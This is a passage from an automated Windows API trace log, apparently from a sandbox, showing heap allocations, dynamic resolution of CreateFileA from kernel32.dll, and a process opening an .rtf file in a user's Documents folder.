(HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0179.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0179.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0179.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0179.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0179.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0179.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0179.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0179.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0179.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0179.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0179.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0179.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0179.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0179.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0179.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0179.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0179.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0179.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0179.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0179.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0179.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0179.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0179.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0179.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0179.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0179.793] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0179.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0179.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0179.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0179.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0179.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0179.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0179.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0179.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0179.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0179.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0179.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0179.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0179.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0179.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0179.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0179.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0179.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0179.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0179.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0179.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0179.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0179.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0179.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0179.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0179.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0179.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0179.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0179.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0179.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0179.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0179.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0179.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0179.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0179.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0179.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0179.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0179.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0179.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0179.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0179.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0179.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0179.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0179.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0179.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0179.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0179.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0179.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0179.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0179.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0179.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0179.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0179.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0179.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0179.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0179.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0179.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0179.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0179.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0179.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0179.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0179.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0179.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0179.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0179.797] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0179.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0179.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0179.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0179.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd7b0 [0179.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd7b0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0179.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0179.798] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0179.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0179.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0179.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0179.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0179.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0179.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0179.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0179.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7b0 [0179.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd7b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0179.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0179.798] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0179.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0179.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0179.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0179.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0179.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0179.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0179.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0179.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0179.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0179.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0179.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0179.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0179.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf", cchWideChar=69, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 69 [0179.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x45) returned 0x9aa4f8 [0179.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf", cchWideChar=69, lpMultiByteStr=0x9aa4f8, cbMultiByte=69, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf", lpUsedDefaultChar=0x0) returned 69 [0179.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0179.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0179.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0179.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0179.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0179.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0179.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0179.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0179.800] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\ynsvrvaq.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0179.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0179.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0179.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0179.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0179.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0179.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0179.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0179.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0179.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0179.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0179.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0179.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0179.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0179.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0179.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=69, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0179.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8a) returned 0x8edfa0 [0179.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=69, lpWideCharStr=0x8edfa0, cchWideChar=69 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf") returned 69 [0179.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0179.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0179.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0179.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0179.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0179.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0179.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0179.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0179.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0179.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0179.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0179.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0179.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0179.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0179.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0179.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0179.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0179.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0179.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0179.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0179.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0179.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0179.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0179.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0179.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0179.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0179.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0179.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0179.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0179.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0179.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0179.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0179.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0179.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0179.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0179.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0179.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0179.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0179.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0179.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0179.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0179.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0179.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0179.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0179.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0179.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0179.804] FreeLibrary (hLibModule=0x75990000) returned 1 [0179.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0179.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0179.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0179.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0179.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0179.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0179.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0179.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0179.804] HeapFree (in: hHeap=0x8a0000, 